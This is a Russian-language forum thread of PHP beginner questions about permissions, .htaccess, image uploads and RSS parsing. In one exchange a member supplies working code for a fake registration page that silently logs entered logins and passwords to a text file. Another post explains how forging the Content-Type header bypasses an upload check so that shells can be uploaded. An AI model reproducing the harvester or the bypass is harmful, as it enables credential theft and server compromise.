[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. sidrus

    sidrus New Member

    Joined:
    16 Feb 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    гг
    спс уже разобрался как код оформить))
     
    #10141 sidrus, 25 May 2009
    Last edited: 25 May 2009
  2. noooob'ik

    noooob'ik Banned

    Joined:
    13 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Привет!)

    Есть скрипт creat_dir.php(CHMOD 771), который находится в папке test(chmod 770), скрипт должен создать др. папку в этой же директории... директория создаётся, но с ней ничего нельзя сделать, даже открыть(при попытке открыть пишет: "<www.wallst.ru> служебная директория").... почему подскажите плз

    также пробывал creat_dir.php(CHMOD 777) и директорию test(CHMOD 777).... не выходит(((

    все это дело происходит на хосте wallst.ru
     
  3. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    noooob'ik Покажите вывод команды ls -la
    PHP:
    <?
    header('Content-Type: text/plain');
    passthru('ls -la /путь/до/папки/test');
    ?>
     
    _________________________
  4. sidrus

    sidrus New Member

    Joined:
    16 Feb 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    здраствуйте,

    ребята памагите написать файк плиз, те мануалы что есть мне не тадходят так как они привязываются к определённому сайту, мне нужен скрипт каторый я ставлю просто на пустую страницу , скрипт регистрации с 4мя полями ввода, логит, парол, подтверждение пароля и емаил и кнопка отослать. при нажатии отослать, скрипт должен тупо сохронять данные в тхт файл и пасылать на страницу типа технические работы .

    помогите плиз
    спс заранее
     
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Code:
    <?
     $form= <<<HTML
    <form method="post"> 
    Введите логин:
     <input type="text" name="login" size="25" /><br>
     Введите пароль:
     <input type="text" name="pass" size="25" /><br>
     Повторите пароль:
     <input type="text" name="retry" size="25" /><br>
     Введите e-mail:
     <input type="text" name="email" size="25" /><br>
     <input type="submit" value='окей' /> 
     </form>
    HTML;
     if (isset($_POST['login']))
    	 {
    	 if ($_POST['login']!="" && $_POST['pass']!="" && $_POST['retry']!="" && $_POST['email']!="")
    	 {
    		$login=$_POST['login'];
    		$pass=$_POST['pass'];
    		$retry=$_POST['retry'];
    		$email=$_POST['email'];
    		$file = fopen("log.txt", "a");
    		fwrite($file, "$login:$pass:$retry:$email\r\n");
    		echo "Техничесике проблемы";
    	}
    	else
    	{
    		echo "Что-то не введено";
    		echo $form;
    	}
    }
    else
    	echo $form;
     ?>
    
    Какой файл создавать (куда убудут пистаься логи) и какие на него парва ставить, догадаешься.
     
  6. Корвин

    Корвин Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    256
    Likes Received:
    31
    Reputations:
    3
    что нужно прописать в htaccess чтобы xml файлы обрабатывались как xml а не как php?
     
  7. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    http://htaccess.net.ru/doc/AddType-MIME/AddType.php
     
    1 person likes this.
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    А XML разве по дефолту обрабатываются как PHP?
    Code:
    AddType text/xml .xml
    
     
    1 person likes this.
  9. Winst0n

    Winst0n Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    92
    Likes Received:
    5
    Reputations:
    0
    --
     
    #10149 Winst0n, 26 May 2009
    Last edited: 9 Jun 2009
  10. ASystem

    ASystem New Member

    Joined:
    5 Mar 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Люди помогите решить задачу, как организовать загрузку картинок на какой-нибудь хост изображений, и после загрузки получить адрес этой картинки для последующего его использования на своем сайте???
     
  11. Zedi

    Zedi Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    317
    Likes Received:
    120
    Reputations:
    13
    Легко организовать с помощью курла, и я кстати такое видел на форуме
     
    1 person likes this.
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204

    Ну так просто послать запрос на заливку, а потом спарсить полученную ссылку.
     
  13. Корвин

    Корвин Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    256
    Likes Received:
    31
    Reputations:
    3

    у меня для всего сайта стоит обработка xml как php, а для определенной папки мне нужно чтобы обрабатывалось как xml
     
  14. ASystem

    ASystem New Member

    Joined:
    5 Mar 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    А пример реализации можно???
     
  15. REBUUS

    REBUUS Active Member

    Joined:
    6 Apr 2009
    Messages:
    330
    Likes Received:
    110
    Reputations:
    9
    PHP:
    $idd='name'
    $size_b=400//ширина большого 
    $size_m=150//ширина маленького 
    $caches_b=30//качество сохранения большого
    $caches_m=40//качество сохранения маленького фото

    $ssss=$_FILES["foto1"]["name"];
    if (
    $_FILES["foto1"]["name"]=='') {
    }else{
    $file=$_FILES["foto1"]["tmp_name"]; 
    $xa=1;
    $file_new="../foto_big/$idd.jpg"
    $res_k=1.5;//коэффициент деления ширины/высоты 
    $old_file_size=filesize($file); 
    $is=GetImageSize("$file"); 
    $old_w=$is[0]; 
    $old_h=$is[1]; 
        
    $cdc=$old_w/$size_b;
        
    $new_w=$size_b
        
    $new_h=$old_h/$cdc
    $img_old=imagecreatefromjpeg($file);  
    $img_new=imagecreatetruecolor($new_w,$new_h);  
     
    imagecopyresized($img_new,$img_old,0,0,0,0,$new_w,
    $new_h,$old_w,$old_h);  
    imagejpeg($img_new$file_new,$caches_b); 


    $cdc=$old_w/$size_m;
    $new_w=$size_m
    $new_h=$old_h/$cdc
    $file_new="../foto_mini/$idd.jpg"
    $img_old=imagecreatefromjpeg($file);  
    $img_new=imagecreatetruecolor($new_w,$new_h);  
    imagecopyresized($img_new,$img_old,0,0,0,0,$new_w,$new_h,$old_w,$old_h);  
    imagejpeg($img_new$file_new,$caches_m); 

    $is_new=GetImageSize("$file_new"); 
    $new_file_size=filesize($file_new); 
    $raznitca=$old_file_size/$new_file_size
    }
    Вот как то делал загрузку на сервер картинок, мкрипт делает два файла один большой другой маленький ($res_k тут выставляеться во сколько раз меньше второй)
     
    #10155 REBUUS, 27 May 2009
    Last edited: 27 May 2009
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Давным-давно валяется, и не где-нибудь, а именно здесь, и именно в "Полезные скрипты", и не от кого-нибудь, а от ЕНОТ:

    Code:
    https://forum.antichat.ru/showpost.php?p=837324&postcount=431
    
    Разуйте глаза:

    PHP:
    <?php 
    /* 
      Пример загрузки файлов на сервер 
    */ 
    #Дира для загруженных файлов 
    $uploaddir ''
    #Разрешённые типы файлов (через запятую) 
    $types 'jpeg,gif,png'
    #Максимальный размер файла (в килобайтах) 
    $maxsize 100

    if(!empty(
    $_FILES)){ 
        
    $maytypes explode(','str_replace(' '''$types)); 
        foreach(
    $maytypes as $maytype){ 
            if(
    stristr($_FILES['filename']['type'], $maytype)){ 
               
    $may 1
               break; 
            }else{ 
               
    $may 0
            } 
        } 
        if(
    $may){ 
            if(
    $_FILES['filename']['size'] <= $maxsize*1024){ 
                
    $dir './'.$uploaddir.'/'.basename($_FILES['filename']['name']); 
                if(
    copy($_FILES['filename']['tmp_name'], $dir)){ 
                    echo 
    'Файл успешно загружен.<br/> 
                    Ссылка на файл: <a href="'
    .$uploaddir.'/'.$_FILES['filename']['name'].'">'.$_FILES['filename']['name'].'</a>'
                }else{ 
                    echo 
    'Возникли ошибки при загрузке файла'
                } 
            }else{ 
                echo 
    'Размер файла превышает '.$maxsize.' килобайт'
            } 
        }else{ 
            echo 
    'Тип файла не входит в состав разрешённых<br/>Разрешённые типы файлов: '.$types
        } 

    ?> 
    <form action="<?=$_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data"> 
    <input name="filename" type="file" /><br /> 
    <input type="submit" value="Загрузить" /> 
    </form>
     
    1 person likes this.
  17. SaiRus

    SaiRus Elder - Старейшина

    Joined:
    24 Nov 2008
    Messages:
    369
    Likes Received:
    41
    Reputations:
    0
    PHP:
    <?  $url 'computers.rss';       //адрес RSS ленты
      
    $xml xml_parser_create();     //создаёт XML-разборщик  
    xml_parser_set_option($xmlXML_OPTION_SKIP_WHITE1);  //устанавливает опции XML-разборщика  
    xml_parse_into_struct($xmlfile_get_contents($url), $element$index); //разбирает XML-данные в структуру массива
      
    xml_parser_free($xml);  //освобождает XML-разборщик 
     
    $count 5;      //число проходов цикла. 
      
    for ($i=1$i $count$i++) {                    echo '<a href='.$element[$index["LINK"][$i+1]]["value"].'> <h1>'.$element[$index["TITLE"][$i+1]]["value"].'</h1> </a>';          //выводим на печать заголовок статьи 
              
    echo '<p>'.$element[$index["DESCRIPTION"][$i]]["value"].'</p>';            //выводим на печать текст статьи  }  ?>
    нашел в инете парсер рсс ленты, ни кто не подскажет, как тут видно в переменную $url засылается локаьлный канал rss - computers.rss, почему то скрипт не работает когда я указываю на источник из вне, это проблемма решиться если я выложу сайт на хост?
     
  18. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    2 .:EnoT:. , Pashkela and all
    Скажу немного не по теме, но возможно моя маленькая заметка убережет людей от потери информации на сервере... =)
    PHP:
    if(stristr($_FILES['filename']['type'], $maytype)){
    Чтобы обойти данную проверку, достаточно всего лишь изменить в пост пакете Content-Type с текущим значением, на Content-Type: image/gif, и можно грузить все что душе угодно, включая шеллы ;)
     
    1 person likes this.
  19. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    для этого я и писал ф-цию для заливки фоток ток она немного старая и код там немного ламерский ну ничё сойдёт ))) основное там в порядке =)

    http://forum.antichat.ru/showpost.php?p=781805&postcount=4
     
  20. Dr.Bodja

    Dr.Bodja Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    29
    Likes Received:
    7
    Reputations:
    0
    Есть php-скрипт, который считает хосты при посещении, никаких куков, и ява скриптов. Нужен скрипт, чтобы отправлять запрос эмулирующий браузер.

    Вот как
    Но без отображение этого сайта.
     
Loading...
Thread Status:
Not open for further replies.